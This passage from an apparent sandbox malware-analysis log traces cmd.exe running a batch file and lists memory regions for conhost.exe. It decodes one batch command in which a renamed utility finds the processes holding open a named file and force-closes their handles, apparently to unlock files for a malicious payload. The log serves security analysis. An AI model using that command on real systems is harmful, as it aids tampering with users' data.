_String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0296.318] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0296.318] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0296.319] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x9de840 | out: lpFindFileData=0x9de840) returned 0xcb09d8 [0296.628] FindClose (in: hFindFile=0xcb09d8 | out: hFindFile=0xcb09d8) returned 1 [0296.628] _wcsicmp (_String1="cd", _String2=")") returned 58 [0296.628] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0296.628] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0296.628] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0296.628] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0296.628] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0296.628] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0296.629] _tell (_FileHandle=3) returned 78 [0296.629] _close (_FileHandle=3) returned 0 [0296.629] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df180 | out: _Buffer="\r\n") returned 2 [0296.629] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.629] GetFileType (hFile=0x3c) returned 0x2 [0296.629] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.629] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df158 | out: lpMode=0x9df158) returned 1 [0296.768] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.768] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df170, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df170*=0x2) returned 1 [0296.902] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.902] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.902] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9df17c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0296.902] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x9df17c | out: _Buffer=">") returned 1 [0296.902] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.902] GetFileType (hFile=0x3c) returned 0x2 [0296.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.902] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df15c | out: lpMode=0x9df15c) returned 1 [0296.981] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.982] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9df174, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x9df174*=0x1e) returned 1 [0297.119] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.119] GetFileType (hFile=0x3c) returned 0x2 [0297.119] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.119] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3fc | out: lpMode=0x9df3fc) returned 1 [0297.336] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.336] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcc81e8*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df414, lpReserved=0x0 | out: lpBuffer=0xcc81e8*, lpNumberOfCharsWritten=0x9df414*=0x2) returned 1 [0297.368] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x9df41c | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0297.368] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.368] GetFileType (hFile=0x3c) returned 0x2 [0297.368] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.368] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0297.554] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.554] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x25) returned 1 [0298.062] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df430 | out: _Buffer="\r\n") returned 2 [0298.062] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.062] GetFileType (hFile=0x3c) returned 0x2 [0298.062] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0298.062] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df408 | out: lpMode=0x9df408) returned 1 [0298.273] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.273] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df420, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df420*=0x2) returned 1 [0299.132] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0299.132] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0299.132] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0299.132] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0299.132] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0299.132] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0299.132] GetConsoleTitleW (in: lpConsoleTitle=0x9defa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0299.401] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0299.401] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0299.401] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0299.401] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0299.401] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0299.401] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0299.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0299.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x9ded58, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x9ded50, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x9ded50*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0299.401] _wcsnicmp (_String1="/d", _String2="/D", _MaxCount=0x2) returned 0 [0299.401] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9deafc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0299.401] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x9deafc, lpFilePart=0x9deaf4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x9deaf4*=0x0) returned 0x1e [0299.401] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0299.402] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x9de878 | out: lpFindFileData=0x9de878) returned 0xcbcb90 [0299.402] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0299.402] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x9de878 | out: lpFindFileData=0x9de878) returned 0xcbcb90 [0299.402] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0299.402] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0299.402] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x9de878 | out: lpFindFileData=0x9de878) returned 0xcbcb90 [0299.402] FindClose (in: hFindFile=0xcbcb90 | out: hFindFile=0xcbcb90) returned 1 [0299.402] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0299.402] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0299.402] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0299.402] GetEnvironmentStringsW () returned 0xcbb300* [0299.402] FreeEnvironmentStringsA (penv="=") returned 1 [0299.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0299.403] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.403] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0299.592] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.592] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0299.888] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.888] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0300.043] SetConsoleInputExeNameW () returned 0x1 [0300.043] GetConsoleOutputCP () returned 0x1b5 [0300.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0300.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0300.499] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9df3ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0300.500] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0300.500] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.500] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0300.500] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.500] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0300.501] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9df3bc, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x9df3bc*=0x94, lpOverlapped=0x0) returned 1 [0300.501] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0300.501] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.501] GetFileType (hFile=0xb0) returned 0x1 [0300.501] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.501] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0300.502] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"Memo.jtp\"") returned 0xa [0300.502] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0300.502] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0300.502] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0300.502] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0300.502] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0300.502] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0300.503] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0300.503] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0300.503] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0300.503] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0300.503] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0300.503] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0300.504] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0300.504] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0300.504] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0300.504] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0300.504] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0300.504] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0300.505] _tell (_FileHandle=3) returned 226 [0300.505] _close (_FileHandle=3) returned 0 [0300.505] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df180 | out: _Buffer="\r\n") returned 2 [0300.505] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.505] GetFileType (hFile=0x3c) returned 0x2 [0300.505] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.505] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df158 | out: lpMode=0x9df158) returned 1 [0300.662] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.662] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df170, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df170*=0x2) returned 1 [0300.772] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0300.772] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0300.772] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9df17c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0300.773] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x9df17c | out: _Buffer=">") returned 1 [0300.773] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.773] GetFileType (hFile=0x3c) returned 0x2 [0300.773] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.773] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df15c | out: lpMode=0x9df15c) returned 1 [0300.791] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.791] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9df174, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x9df174*=0x1e) returned 1 [0300.977] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x9df41c | out: _Buffer="FOR") returned 3 [0300.977] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.977] GetFileType (hFile=0x3c) returned 0x2 [0300.978] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.978] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0300.997] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.997] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x3) returned 1 [0301.084] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x9df41c | out: _Buffer=" /F") returned 3 [0301.084] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.084] GetFileType (hFile=0x3c) returned 0x2 [0301.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.085] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0301.196] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.196] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x3) returned 1 [0301.257] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x9df41c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0301.257] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.257] GetFileType (hFile=0x3c) returned 0x2 [0301.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.258] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0301.367] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.367] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x20) returned 1 [0301.402] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x9df41c | out: _Buffer=" %I IN ") returned 7 [0301.402] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.402] GetFileType (hFile=0x3c) returned 0x2 [0301.402] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.402] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0301.435] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.435] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x7) returned 1 [0301.438] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x9df418 | out: _Buffer="(`vIDhS3md.exe -accepteula \"Memo.jtp\" -nobanner`) DO ") returned 53 [0301.438] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.438] GetFileType (hFile=0x3c) returned 0x2 [0301.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.438] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f0 | out: lpMode=0x9df3f0) returned 1 [0301.444] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.444] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0x9df408, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df408*=0x35) returned 1 [0301.559] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.559] GetFileType (hFile=0x3c) returned 0x2 [0301.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.559] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3fc | out: lpMode=0x9df3fc) returned 1 [0301.806] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.806] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x9df414, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x9df414*=0x1) returned 1 [0301.821] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.821] GetFileType (hFile=0x3c) returned 0x2 [0301.821] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.821] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3ec | out: lpMode=0x9df3ec) returned 1 [0301.829] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.829] WriteConsoleW (hConsoleOutput=0x3c, lpBuffer=0xcbca98, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x9df404, lpReserved=0x0) Thread: id = 937 os_tid = 0x99c Process: id = "119" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5d630000" os_pid = "0xf3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0x5c0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8458 start_va = 0x7f517000 end_va = 0x7f517fff entry_point = 0x0 region_type = private name = "private_0x000000007f517000" filename = "" Region: id = 8459 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8460 start_va = 0xfb07730000 end_va = 0xfb0774ffff entry_point = 0x0 region_type = private name = "private_0x000000fb07730000" filename = "" Region: id = 8461 start_va = 0xfb07750000 end_va = 0xfb07763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07750000" filename = "" Region: id = 8462 start_va = 0xfb07770000 end_va = 0xfb077affff entry_point = 0x0 region_type = private name = "private_0x000000fb07770000" filename = "" Region: id = 8463 start_va = 0x7df5ff060000 end_va = 0x7ff5ff05ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff060000" filename = "" Region: id = 8464 start_va = 0x7ff7fcc60000 end_va = 0x7ff7fcc82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcc60000" filename = "" Region: id = 8465 start_va = 0x7ff7fcc83000 end_va = 0x7ff7fcc83fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcc83000" filename = "" Region: id = 8466 start_va = 0x7ff7fcc8e000 end_va = 0x7ff7fcc8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcc8e000" filename = "" Region: id = 8467 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8468 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8469 start_va = 0xfb07730000 end_va = 0xfb0773ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb07730000" filename = "" Region: id = 8470 start_va = 0xfb077f0000 end_va = 0xfb078effff entry_point = 0x0 region_type = private name = "private_0x000000fb077f0000" filename = "" Region: id = 8471 start_va = 0xfb078f0000 end_va = 0xfb079adfff entry_point = 0xfb078f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8472 start_va = 0x7ff7fcb60000 end_va = 0x7ff7fcc5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcb60000" filename = "" Region: id = 8473 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8474 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8475 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8476 start_va = 0xfb077b0000 end_va = 0xfb077effff entry_point = 0x0 region_type = private name = "private_0x000000fb077b0000" filename = "" Region: id = 8477 start_va = 0xfb079b0000 end_va = 0xfb07afffff entry_point = 0x0 region_type = private name = "private_0x000000fb079b0000" filename = "" Region: id = 8478 start_va = 0x7ff7fcc8c000 end_va = 0x7ff7fcc8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fcc8c000" filename = "" Region: id = 8479 start_va = 0xfb07740000 end_va = 0xfb07746fff entry_point = 0x0 region_type = private name = "private_0x000000fb07740000" filename = "" Region: id = 8480 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8481 start_va = 0xfb079b0000 end_va = 0xfb079b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fb079b0000" filename = "" Region: id = 8482 start_va = 0xfb07af0000 end_va = 0xfb07afffff entry_point = 0x0 region_type = private name = "private_0x000000fb07af0000" filename = "" Region: id = 8483 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8484 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8485 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8486 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8487 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8488 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8489 start_va = 0xfb079c0000 end_va = 0xfb079c6fff entry_point = 0x0 region_type = private name = "private_0x000000fb079c0000" filename = "" Region: id = 8490 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8491 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8492 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = 